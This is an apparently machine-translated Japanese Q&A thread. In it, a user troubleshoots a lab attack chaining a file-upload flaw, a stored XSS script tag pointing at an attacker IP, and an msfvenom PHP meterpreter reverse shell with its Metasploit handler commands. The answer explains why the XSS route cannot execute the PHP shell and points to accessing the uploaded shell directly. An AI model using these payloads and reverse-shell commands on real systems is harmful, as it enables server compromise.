web-dev-qa-db-ja.com

保存されたXSS + PHPバックドア+ファイルアップロードの脆弱性

ファイルアップロードの脆弱性とXSSを利用できるこのWebアプリケーションを作成しました(PHP 5 + MySQL)を使用)。

私の攻撃のルートは:

  1. Msfvenomで作成したPHPバックドアをアップロードします
  2. XSSの脆弱性がある別のページに移動する
  3. 持ってる <"script src="ATTACKING IP:PORT443/phpbackdoor.php"></script>入力として
  4. リスナー/ meterpreterをオンにします

これらの4つのステップは機能しているように見えますが、meterpreterセッションが作成されると、シェルを起動したり、コマンド(sysinfoなど)を実行することさえできなくなりました。最新のKaliアップデートを使用しています。

私のターゲットボックスはUbuntu 16.04で、WebアプリケーションはLAMPPまたはlocalhost上で実行されています。

私のNATはオンになっていますが、両方のポート443が両方の仮想マシンで開かれています。

ペイロードとコマンドを順番に作成するために使用したものは次のとおりです。

msfvenom -p php/meterpreter_reverse_tcp LHOST=attacking ip LPORT=443 -f raw > Shell.php
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost attacking ip
set lport 443
exploit

何かがメータープリーターを壊していて、それが何であるか私は指摘できませんでした。

2
hashsaltpepper

あなたがこれをするとき<"script src="ATTACKING IP:PORT443/phpbackdoor.php"></script>ファイルはサーバー側ではまったく実行されず、代わりに犠牲となるブラウザーによって実行されます。もちろん、そのPHPファイルは機能しません。ブラウザーはその中でJavaScriptを探します。たとえば、PHP echo "VALID JAVASCRIPT"を実行すると、ブラウザによって実行されます。そのように悪用することはできません。代わりに、PHPシェル https://example.com/Shell.php またはPHPファイルのインクルードのような他の脆弱性)にアクセスするだけで悪用します。

つまり、サーバー側にアップロードされたシェルは、この方法で実行されません。

3
Vipul Nair